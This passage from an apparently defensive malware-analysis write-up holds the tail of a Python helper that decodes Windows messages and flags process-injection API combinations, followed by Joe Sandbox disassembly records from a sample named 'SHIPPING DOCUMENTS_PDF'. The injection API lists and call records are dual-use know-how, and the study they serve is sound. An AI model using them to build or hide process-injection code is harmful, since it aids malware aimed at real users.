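                      0x1111: "TVM_HITTEST", 0x113E: "TVM_GETITEMW"},
    "SysListView32": {0x1004: "LVM_GETITEMCOUNT", 0x100C: "LVM_GETNEXTITEM",
                      0x104B: "LVM_GETITEMW", 0x1073: "LVM_GETITEMTEXTW"},
    "SysMonthCal32": {0x1002: "MCM_SETCURSEL", 0x1004: "MCM_SETMAXSELCOUNT", 0x1009: "MCM_GETMINREQRECT"},
    "msctls_updown32": {0x0465: "UDM_SETRANGE", 0x0469: "UDM_SETBUDDY"},
    "msctls_trackbar32": {0x0405: "TBM_SETPOS", 0x0406: "TBM_SETRANGE", 0x0414: "TBM_SETPAGESIZE"},
    "Listbox": {0x0180: "LB_ADDSTRING", 0x0186: "LB_SETCURSEL"},
}
FOREIGN_MEMORY_APIS = ("OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory")
THREAD_START_APIS = {"CreateRemoteThread", "SetThreadContext", "QueueUserAPC", "NtQueueApcThread"}


def _arg(text):
    """'?' is a value the analyzer could not resolve; hex becomes int; anything
    else (a window class or DLL name literal) stays a string."""
    if text == "?":
        return None
    try:
        return int(text, 16)
    except ValueError:
        return text


def parse_record(text):
    """Turn the bullet lines of one function record into Call tuples."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            args = tuple(_arg(a) for a in m["args"].split(",") if a)
            calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls


def decode_access(mask):
    """Expand an OpenProcess access mask into named rights; unknown bits stay hex."""
    names = [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]
    unknown = mask & ~sum(PROCESS_RIGHTS)
    return names + ([hex(unknown)] if unknown else [])


def decode_message(msg, window_class=None):
    """Candidate names for a SendMessage uMsg.  With a class (take it from the record's
    String ID) the answer is exact; without one, every class whose table defines the
    value is listed, which is how the shared 0x1000 range shows up."""
    if window_class is not None:
        return [MESSAGES.get(window_class, {}).get(msg, hex(msg))]
    hits = [table[msg] for table in MESSAGES.values() if msg in table]
    return hits or [hex(msg)]


def sendmessage_names(calls, window_class=None):
    """Decoded uMsg (second argument) of every SendMessageW in the record."""
    return ["/".join(decode_message(c.args[1], window_class))
            for c in calls if c.api == "SendMessageW"]


def foreign_memory_profile(calls):
    """Which of the four cross-process memory APIs the record uses, from which helper
    functions, with what rights and page protection, and whether any thread-start API
    is present.  A PAGE_READWRITE buffer that is read back is a data exchange; an
    injector needs an executable page and one of THREAD_START_APIS."""
    seen = {c.api for c in calls}
    profile = {
        "apis": [a for a in FOREIGN_MEMORY_APIS if a in seen],
        "complete": all(a in seen for a in FOREIGN_MEMORY_APIS),
        "helpers": sorted({c.subcall for c in calls if c.api in FOREIGN_MEMORY_APIS and c.subcall}),
        "thread_start": sorted(seen & THREAD_START_APIS),
    }
    for c in calls:
        if c.api == "OpenProcess" and c.args[0] is not None:
            profile["rights"] = decode_access(c.args[0])
        elif c.api == "VirtualAllocEx" and c.args[4] is not None:
            profile["protect"] = PAGE_PROTECT.get(c.args[4], hex(c.args[4]))
    return profile


if __name__ == "__main__":
    record = parse_record(SAMPLE_RECORD)
    print(sendmessage_names(record))
    print(foreign_memory_profile(record))
```

Run as is, the script reports the three SendMessageW calls as TVM_GETITEMRECT, TVM_HITTEST, TVM_HITTEST and a complete four-API primitive living in helpers 00BB13DE, 00BB1487 and 00BB14BC with PAGE_READWRITE and an empty thread_start list. To reuse it on another record, paste that record's bullet lines into the input and pass the class from its String ID to `sendmessage_names`; for the SysMonthCal32 record further down, 0x1009 then resolves to MCM_GETMINREQRECT rather than to a list-view message.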
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BDF910,00000000,?,?,?,?), ref: 00BD79DF
                                                                                    • GetWindowLongW.USER32 ref: 00BD79FC
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD7A0C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: a15309a198abc8e252ea6879365d2220ace69ea9a51811b49ac5eb439ca4ff50
                                                                                    • Instruction ID: 5101f1b6e48fde0a9a2a7e80d0997dadb1b46dfb2ea8d3cf988a6908cefe8b82
                                                                                    • Opcode Fuzzy Hash: a15309a198abc8e252ea6879365d2220ace69ea9a51811b49ac5eb439ca4ff50
                                                                                    • Instruction Fuzzy Hash: FA31D032245606AFDB118F38CC55BEABBE9EB05324F244766F875932E0FB34E9508B50
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BD7461
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BD7475
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD7499
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: SysMonthCal32
                                                                                    • API String ID: 2326795674-1439706946
                                                                                    • Opcode ID: d341b71204918a275d8c6e73dd7fe0c8a818b7a24855a2d3fa00c176781f69fb
                                                                                    • Instruction ID: 374f026e74393a4684ad241af2259846ac52cfbbe69f840a0befdebc89360c77
                                                                                    • Opcode Fuzzy Hash: d341b71204918a275d8c6e73dd7fe0c8a818b7a24855a2d3fa00c176781f69fb
                                                                                    • Instruction Fuzzy Hash: 3521B132540219ABDF228E54CC42FEA7BA9EB48724F110155FE156B2D0EAB5AC50CBA0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BD7C4A
                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BD7C58
                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BD7C5F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    • API String ID: 4014797782-2298589950
                                                                                    • Opcode ID: b2edff2eb0675c252e78caf759205ecf1338c47cdbd68b4b6c380d34d2643f38
                                                                                    • Instruction ID: 1d5a301672e4ea536bbeef4e9993a2a94425109c286d9a6451fa7d5c3e3da091
                                                                                    • Opcode Fuzzy Hash: b2edff2eb0675c252e78caf759205ecf1338c47cdbd68b4b6c380d34d2643f38
                                                                                    • Instruction Fuzzy Hash: 782181B1644109AFDB10DF28DCD1DAA77ECEF4A354B14409AF9019B3A1EB31EC01CB60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BD6D3B
                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BD6D4B
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BD6D70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    • API String ID: 3315199576-2633736733
                                                                                    • Opcode ID: c0add64a4fd5ece4c5b6a378f99d5a39c621864b91d541d9bd7bd0b5a185c05a
                                                                                    • Instruction ID: 8b3e0d7425d947483f8a90e35f773cb15e71805d41bf2fa73329912e9458e007
                                                                                    • Opcode Fuzzy Hash: c0add64a4fd5ece4c5b6a378f99d5a39c621864b91d541d9bd7bd0b5a185c05a
                                                                                    • Instruction Fuzzy Hash: 1B21FF32611118BFDF118F54DC81FBB7BBAEF89760F01817AF9459B2A0DA719C518BA0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BD7772
                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BD7787
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BD7794
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    • API String ID: 3850602802-1010561917
                                                                                    • Opcode ID: 0eab540b05734c8d98a05b64351b7b64d3f079864e08f200cdb70d505f098050
                                                                                    • Instruction ID: b7585adfff18779a87cc83b030cf1d1bded16ba2ccbfb5fa9af40968050eaa0a
                                                                                    • Opcode Fuzzy Hash: 0eab540b05734c8d98a05b64351b7b64d3f079864e08f200cdb70d505f098050
                                                                                    • Instruction Fuzzy Hash: 6C113A32244208BFEF209F64CC01FEBB7ACEF88B54F014529FA45921D0E671E811CB10
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54B83,?), ref: 00B54C44
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B54C56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-1355242751
                                                                                    • Opcode ID: f0731d1644abdba0c589e7530e9ea670c041fa9ab541a08bc87a844837b37390
                                                                                    • Instruction ID: c34a280f92bc41490b39c5d1ba6565619c14217f32d2cbf9dfe6ab48e21a7112
                                                                                    • Opcode Fuzzy Hash: f0731d1644abdba0c589e7530e9ea670c041fa9ab541a08bc87a844837b37390
                                                                                    • Instruction Fuzzy Hash: ECD01730515713CFD7209F31D91876AB7E4EF05356B1588BB99A6E62A8FB70D8C0CA50
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54BD0,?,00B54DEF,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54C11
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B54C23
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-3689287502
                                                                                    • Opcode ID: 55f980cfe092f9e9cdcdf006ab5fa5af7ea13e688167a23095e177028297eba6
                                                                                    • Instruction ID: 8e9b605322e2deee92dc4a21e08d3de061364cb300e0839cd43ee792fd3bc8a8
                                                                                    • Opcode Fuzzy Hash: 55f980cfe092f9e9cdcdf006ab5fa5af7ea13e688167a23095e177028297eba6
                                                                                    • Instruction Fuzzy Hash: 88D0E23051A713CFD720AB75D918716BAE5EF09356B1588BA9896E62A0EBB0D880CA50
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00BD1039), ref: 00BD0DF5
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BD0E07
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 2574300362-4033151799
                                                                                    • Opcode ID: 7285ba4fde11712f8d245c7565a91b3bace92bc7c311b296c8560b785034bdeb
                                                                                    • Instruction ID: f16e1c854a46aefbf71fbcea9758d87530029ceca0d95306f9e17867c57a5dbc
                                                                                    • Opcode Fuzzy Hash: 7285ba4fde11712f8d245c7565a91b3bace92bc7c311b296c8560b785034bdeb
                                                                                    • Instruction Fuzzy Hash: E9D0E270920723CFD720AB76C80879AB7E9EF05352F158C7E9496E2291EAB0D890CB55
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00BC8CF4,?,00BDF910), ref: 00BC90EE
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BC9100
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                    • API String ID: 2574300362-199464113
                                                                                    • Opcode ID: 24886207c0776fc3784951df306c2451fde32d3dd8da85126bbfd0110f170639
                                                                                    • Instruction ID: 408f08244ae180e28812bb7fcd559b90964d8554315b4c8402260c5a775e79a0
                                                                                    • Opcode Fuzzy Hash: 24886207c0776fc3784951df306c2451fde32d3dd8da85126bbfd0110f170639
                                                                                    • Instruction Fuzzy Hash: E8D0E234514713DFEB209B71D82EA16B6E5AF05391B1A887E9496E66A0FA70C880CA90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocalTime__swprintf
                                                                                    • String ID: %.3d$WIN_XPe
                                                                                    • API String ID: 2070861257-2409531811
                                                                                    • Opcode ID: d0fd03971af4a4d79072ab53e0fa16e253737b71d0220265ade060464a98d096
                                                                                    • Instruction ID: 5cc1f600550b080715ba3f69ea6ad365b285f45175cf917994d6b8e5704a80e7
                                                                                    • Opcode Fuzzy Hash: d0fd03971af4a4d79072ab53e0fa16e253737b71d0220265ade060464a98d096
                                                                                    • Instruction Fuzzy Hash: 2DD012F180910BEACF0097D498D89B977FCA708701F5008F2B506A3090E6398F54F621
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a4f3bdc08197bd41849ae9ccec9c3507daca1aa930c13246b1f068288b0907a
                                                                                    • Instruction ID: b942e7c42c7d116a0d68ac9b7b14216c748dfce02ae8281af500d7588edb0ed2
                                                                                    • Opcode Fuzzy Hash: 3a4f3bdc08197bd41849ae9ccec9c3507daca1aa930c13246b1f068288b0907a
                                                                                    • Instruction Fuzzy Hash: 55C13875A0C216AFCB14CFA4C884AAEBBF5FF49714B158598E805EB351DB30ED81DB90
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00BCE0BE
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00BCE101
                                                                                      • Part of subcall function 00BCD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BCD7C5
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00BCE301
                                                                                    • _memmove.LIBCMT ref: 00BCE314
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 3659485706-0
                                                                                    • Opcode ID: 6385dde5da3b54c674ab7e6650d6ba0fd9053395fa3b4f84ad437e8361d3e588
                                                                                    • Instruction ID: 0fa2c1c6b4ddf5a84ce3be9ed35011938ac0c929ed66de728885e94e8b574c93
                                                                                    • Opcode Fuzzy Hash: 6385dde5da3b54c674ab7e6650d6ba0fd9053395fa3b4f84ad437e8361d3e588
                                                                                    • Instruction Fuzzy Hash: DEC15871608301DFC715DF28C480A6ABBE4FF89714F1489AEF8A99B351D731E946CB82
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 00BC80C3
                                                                                    • CoUninitialize.OLE32 ref: 00BC80CE
                                                                                      • Part of subcall function 00BAD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BAD5D4
                                                                                    • VariantInit.OLEAUT32(?), ref: 00BC80D9
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BC83AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 780911581-0
                                                                                    • Opcode ID: fa31198798fde708eb6be951c6ae6d49a742ac7d248ae9434faabf9c42b8dd6e
                                                                                    • Instruction ID: b3aef4d8c8c5cb34c891ba2f78ff768a7318005d9ef0e2f8e3e04cf15c04ff22
                                                                                    • Opcode Fuzzy Hash: fa31198798fde708eb6be951c6ae6d49a742ac7d248ae9434faabf9c42b8dd6e
                                                                                    • Instruction Fuzzy Hash: 42A12535604B019FDB10DF54C885B2AB7E4BF89354F18449DF99A9B3A1CB30ED05CB96
                                                                                    APIs
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BE2C7C,?), ref: 00BA76EA
                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BE2C7C,?), ref: 00BA7702
                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00BDFB80,000000FF,?,00000000,00000800,00000000,?,00BE2C7C,?), ref: 00BA7727
                                                                                    • _memcmp.LIBCMT ref: 00BA7748
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 314563124-0
                                                                                    • Opcode ID: 8ad0fec30d3cb4e43353742aa5b4e0aaf4e23153324393dbeb99ce4e18d6a1f0
                                                                                    • Instruction ID: 118b39d4911b12451cf4d12a3895e5e3d396e898b8d255729370bd90f0abf7af
                                                                                    • Opcode Fuzzy Hash: 8ad0fec30d3cb4e43353742aa5b4e0aaf4e23153324393dbeb99ce4e18d6a1f0
                                                                                    • Instruction Fuzzy Hash: D7811E75A04109EFCB04DFA8C984EEEB7F9FF89315F204599E505AB250DB71AE05CB60
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
